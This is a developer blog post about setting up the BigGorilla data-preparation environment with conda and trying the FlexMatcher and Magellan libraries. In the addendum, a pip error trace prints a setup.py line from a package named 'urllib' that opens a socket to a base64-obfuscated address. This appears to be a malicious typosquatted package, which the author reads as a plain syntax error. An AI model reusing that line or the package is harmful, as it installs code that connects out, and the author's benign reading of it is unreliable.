When I was interested in data preprocessing and was looking for materials, I came across a press release: [Recruit Artificial Intelligence Laboratory started offering "Big Gorilla", an open source ecosystem for data integration and preparation | Recruit Holdings](http://www.recruit.jp/news_data/release/2017/0630_17541.html).
At first glance, I wasn't sure what it was, so I looked up the outline.
BigGorilla - Data Integration & Preparation in Python
- A Python environment with recommended libraries for data preprocessing
- Includes some libraries of their own
From the naming and the figure on the official website it seemed like a huge framework, but it is, so to speak, an assortment of libraries. (There is no BigGorilla-specific class to inherit from.)
To actually do the preprocessing, you write ordinary Python code as usual.
Recommendation for building a portable Python environment with conda - Qiita
# Add anaconda first
$ conda env create biggorilla/py3gorilla
# If you are using pyenv, you need to invoke conda's activate script by its full path; a plain "source activate Py3Gorilla" crashes the shell.
$ source /Users/kkanazaw/.pyenv/versions/anaconda3-4.2.0/envs/Py3Gorilla/bin/activate Py3Gorilla
Reference: Let's get started | BigGorilla
~~Addendum: When I tried it as of July 12, 2017, this method did not work and the following error appeared. (It seems an older yml is being applied, probably because the name of the file updated in June is odd. It will probably be fixed by a future update.)~~
2017/07/21 postscript: The file has been updated. This should work as documented.
$ conda env create biggorilla/py3gorilla
Collecting urllib==1.21.1
Downloading urllib-1.21.1.tar.gz (226kB)
100% |████████████████████████████████| 235kB 640kB/s
Complete output from command python setup.py egg_info:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/private/var/folders/bx/k4yrl_bd3nb0v8pz7fm60t8r0000gp/T/pip-build-58rsg5li/urllib/setup.py", line 191
s.connect((base64.b64decode(rip), 017620))
^
SyntaxError: invalid token
----------------------------------------
Command "python setup.py egg_info" failed with error code 1 in /private/var/folders/bx/k4yrl_bd3nb0v8pz7fm60t8r0000gp/T/pip-build-58rsg5li/urllib/
CondaValueError: Value error: pip returned an error.
You can work around this by downloading the yml from Files :: Anaconda Cloud, removing the line that specifies urllib, and creating the environment from the edited file.
# Remove the environment once
$ conda env remove -n Py3Gorilla
# Recreate the environment from the locally modified yml file
$ conda env create --name test --file ~/Downloads/Py3Gorilla.yml
# As above, if you are using pyenv, invoke conda's activate script by its full path; otherwise the shell crashes.
$ source /Users/kkanazaw/.pyenv/versions/anaconda3-4.2.0/envs/test/bin/activate test
# Download the sample notebook to check that the environment works, and start it
$ anaconda download biggorilla/hi_gorilla
$ jupyter notebook hi_gorilla.ipynb
The list of packages to be installed is on Files :: Anaconda Cloud, so take a look. It turns out that only a small part of the components introduced on the official website is actually installed; compared with the explanation on the site, the composition is surprisingly minimal. If something you need is missing, pip install it yourself.
- urllib: standard library for HTTP access
- requests: an HTTPS access library richer than urllib
- scrapy: scraping
  - (Tweepy is not included)
- beautifulsoup4: loading and parsing web pages
- lxml: XML parser
- nltk: natural language processing (morphological analysis, etc.)
- FlexMatcher (made by the Recruit Artificial Intelligence Laboratory)
- Magellan (developed by the University of Wisconsin)
  - provided as the py-entitymatching and py-stringmatching libraries
- xlrd: Excel handling
- json, csv: standard library
- Is something not included just because commercial tools exist for it?
- Or is it simply not included?
scikit-learn and jupyter-notebook are also included, probably as dependencies.
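As a quick way to see what actually ended up in the environment, a throwaway snippet like the following can just try importing the packages listed above. The import names here (e.g. bs4 for beautifulsoup4, sklearn for scikit-learn) are my assumptions, so adjust as needed.

```python
# Rough check of which of the listed packages can actually be imported in the
# activated Py3Gorilla environment. Module names are assumptions on my part.
import importlib

candidates = [
    'urllib', 'requests', 'scrapy', 'bs4', 'lxml', 'nltk',
    'flexmatcher', 'py_entitymatching', 'py_stringmatching',
    'xlrd', 'json', 'csv', 'sklearn',
]

for name in candidates:
    try:
        importlib.import_module(name)
        print('{}: OK'.format(name))
    except ImportError as exc:
        print('{}: missing ({})'.format(name, exc))
```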
According to the press release, the following three libraries are their own original implementations.
Currently, RIT is developing packages called KOKO and FlexMatcher, and Professor Doan's team is developing a package called Magellan.
FlexMatcher

- A schema matching library made by the Recruit Artificial Intelligence Laboratory
- Even when the column names differ between two datasets, it automatically finds the correspondence between them
- Does it estimate the similarity by using the contents of the data as training data?
- (Personally the most interesting one; a rough usage sketch follows below)
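Since I have not actually used it yet, here is only a minimal sketch of how schema matching with FlexMatcher seems to work, based on the example in the FlexMatcher README. The tables, column names and the mediated schema below are all made up for illustration.

```python
# Minimal FlexMatcher sketch: two small tables with known mappings to a common
# ("mediated") schema serve as training data, then the mapping for a third
# table with different column names is predicted. Data and names are made up.
import pandas as pd
import flexmatcher

data1 = pd.DataFrame({'year': ['2001', '2002', '2010'],
                      'Movie': ['Movie A', 'Movie B', 'Movie C'],
                      'imdb_rating': ['8.8', '7.1', '6.5']})
data2 = pd.DataFrame({'title': ['Movie D', 'Movie E'],
                      'rating': ['9.0', '5.5'],
                      'release': ['1999', '2015']})

# Known mappings from each table's columns to the mediated schema
mapping1 = {'year': 'movie_year', 'Movie': 'movie_name', 'imdb_rating': 'movie_rating'}
mapping2 = {'title': 'movie_name', 'rating': 'movie_rating', 'release': 'movie_year'}

fm = flexmatcher.FlexMatcher([data1, data2], [mapping1, mapping2], sample_size=100)
fm.train()

# A new table whose column names differ; FlexMatcher guesses the correspondence
data3 = pd.DataFrame({'name': ['Movie F'], 'score': ['7.7'], 'yr': ['2003']})
print(fm.make_prediction(data3))
```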
Magellan

- A data matching library developed by the University of Wisconsin
- It looks like you can merge data with notational variations into one, or do something like address identification / record linkage (a minimal sketch follows below)
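Likewise, a minimal sketch of the Magellan side, limited to the blocking step of py-entitymatching (narrowing down to pairs of records that could refer to the same thing). The tables below are made up, and a real workflow would continue with sampling, labeling and training a matcher, which I have not tried yet.

```python
# Minimal Magellan (py_entitymatching) sketch: keep only pairs of records from
# two tables whose 'name' values share at least one word (overlap blocking).
# Data is made up; a full workflow would go on to train an ML matcher.
import pandas as pd
import py_entitymatching as em

A = pd.DataFrame({'id': [1, 2],
                  'name': ['Tokyo Tower', 'Osaka Castle'],
                  'city': ['Tokyo', 'Osaka']})
B = pd.DataFrame({'id': [1, 2],
                  'name': ['Tokyo  Tower', 'Nagoya Castle'],  # notational variation
                  'city': ['Tokyo', 'Nagoya']})

# Tell py_entitymatching which column is the key of each table
em.set_key(A, 'id')
em.set_key(B, 'id')

# Overlap blocker: candidate pairs must share at least one word in 'name'
ob = em.OverlapBlocker()
candidates = ob.block_tables(A, B, 'name', 'name',
                             word_level=True, overlap_size=1,
                             l_output_attrs=['name', 'city'],
                             r_output_attrs=['name', 'city'])
print(candidates)
```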
KOKO

- Only the name appears in the press release. ~~Unpublished?~~
- The repository turned out to be publicly available
- Actually built the environment with conda env
- Next: try using FlexMatcher and Magellan